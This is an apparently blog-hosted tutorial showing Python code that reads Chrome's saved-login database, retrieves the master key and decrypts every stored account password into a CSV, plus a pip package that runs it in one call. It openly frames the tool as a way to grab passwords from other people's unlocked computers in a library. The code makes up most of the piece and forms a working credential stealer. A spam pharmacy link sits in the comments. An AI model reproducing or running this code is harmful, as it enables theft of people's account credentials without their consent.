• notice
  • Congratulations on the launch of the Sought Tech site

Python implements one-click access to the account password of the computer browser

I found that many people like to use computers to occupy seats in the school library (from the past to the present, I seem to have not been to the school library for many years), and often do not lock the screen when going out. In order to let everyone develop a good habit, I Let's take you to write a small program, you can quickly get all the accounts and passwords you stored in the computer browser without entering any password.

Without further ado, let's start happily~

 

Related documents

Github address

 

development tools

Python version: 3.7.8

Related modules:

pikachupytools module;

pycryptodome module;

And some modules that come with python.

 

Environment construction

Install Python and add it to the environment variable, and pip install the required related modules.

 

Introduction

As we all know, our browsers generally store the account numbers and passwords of many websites we have visited:

Under normal circumstances, viewing these passwords requires entering the computer's power-on password. But in fact, we can also directly view these account passwords in other ways. For example, the default path of the database file for saving account passwords in Google Chrome is:

os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'

We can get the corresponding account password by reading this file:

'''Read database data''' def readdb(self, dbpath, master_key): 
  sql = 'SELECT origin_url, username_value, password_value, date_created, date_last_used FROM logins;' 
  client = sqlite3.connect(dbpath) 
  cursor = client.cursor () 
  with open(self.savename, 'a', newline='', encoding='utf-8-sig') as csv_file: 
      cursor.execute(sql) 
      csv_writer = csv.writer(csv_file, dialect=('excel ')) 
      if not self.write_heads_flag: 
          csv_writer.writerow(self.csv_heads) 
          self.write_heads_flag = True 
      info = [] 
      for row in cursor.fetchall(): 
          for idx in range(len(self.csv_heads)):
              if isinstance(row[idx], bytes):
                  info.append(self.decrypt(row[idx], master_key)) 
              else: 
                  info.append(row[idx]) 
          csv_writer.writerow(info) 
          info = [] 
  cursor.close() 
  client.close()

The password is the encrypted result, and the printout looks like this:

But the decryption is actually very simple. We can know from the information on the Internet. We only need to obtain the key value:

'''Get master key''' def getmasterkey(self, local_state_path): 
  import win32crypt 
  with open(os.environ['USERPROFILE'] + os.sep + local_state_path, 'r', encoding='utf-8') as fp: 
      local_state = fp.read() 
      local_state = json.loads(local_state) 
  master_key = base64.b64decode(local_state['os_crypt']['encrypted_key']) 
  master_key = master_key[5:] 
  master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] 
  return master_key

Then decode it according to the key value:

'''Decode''' def decrypt(self, value, master_key): 
  print(value) 
  if value[:3] == b'v10': 
      from Crypto.Cipher import AES 
      iv, payload = value[3:15] , value[15:] 
      cipher = AES.new(master_key, AES.MODE_GCM, iv) 
      decrypted_value = cipher.decrypt(payload) 
      decrypted_value = decrypted_value[:-16].decode() 
  else: 
      import win32crypt 
      decrypted_value = win32crypt.CryptUnprotectData( value)[1].decode() 
  return decrypted_value

The results of the operation after decoding are as follows:

The obtained results are saved in results.csv by default. The screenshots are as follows:

ok, you're done, see the relevant documents for the complete source code.

Friends who want to test quickly just need to pip install the pikachupytools package:

pip install pikachupytools --upgrade

Then simply write a few lines of code to call and run:

from pytools import pytools

tool_client = pytools.pytools()
tool_client.execute('decryptbrowser')


Tags

Technical otaku

Sought technology together

Related Topic

1 Comments

author

buy lipitor 20mg online & lt;a href="https://lipiws.top/"& gt;order lipitor 10mg generic& lt;/a& gt; order lipitor 10mg

Lzxsvr

2024-03-08

Leave a Reply

+